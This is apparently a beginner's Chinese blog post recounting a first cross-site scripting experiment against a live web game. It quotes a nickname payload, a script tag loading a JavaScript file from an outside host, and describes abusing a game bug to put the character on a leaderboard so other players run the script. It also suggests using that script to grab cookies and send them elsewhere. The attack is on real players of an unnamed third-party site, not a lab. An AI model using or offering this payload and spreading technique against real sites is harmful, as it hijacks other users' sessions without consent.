xss小试牛刀
in 安全 with 0 comment

xss小试牛刀

in 安全 with 0 comment

第一次正式的去了解xss,之前都是在wooyun上看到各类xss漏洞,感叹一下白帽子技术了解就完事了。

xss的解释,援引百度百科

跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

这次挑选了一个webgame作为对象进行xss攻击实验

输入游戏名处的html code
在图上的位置,是游戏玩家输入游戏昵称的地方。之前经过测试此处存在xss漏洞。

然后输入以下的注入代码

骑士<script src="http://www.wantsget.com/1.js"></script>

由于服务器并未对该处提交进行正则过滤,所以此处xss已经成功注入。

注入成功
此时我发现,现在的js仅仅对当前玩家有效,而对其他的玩家并没有造成影响。

那么如何对其他玩家也造成影响呢?我依靠游戏BUG把玩家等级刷入到排行榜中。

则其他玩家在访问排行榜时,也会触发这条js。

以上的代码已经演成功示了xss的注入,之后就是利用1.js来做一些事情。

例如获取用户的cookie,然后ajax发送到指定的网页等等。


补充:
= =我发现js貌似不能读写文件、用户磁盘信息,和跨域读取cookie。(原谅以前的我天真的以为。)

所以xss的问题似乎只是针对一个网站= =。。。

一些参考文献:
XSS文件上传
存在过滤时,xss的写法
XSS实例合集

Comments are closed.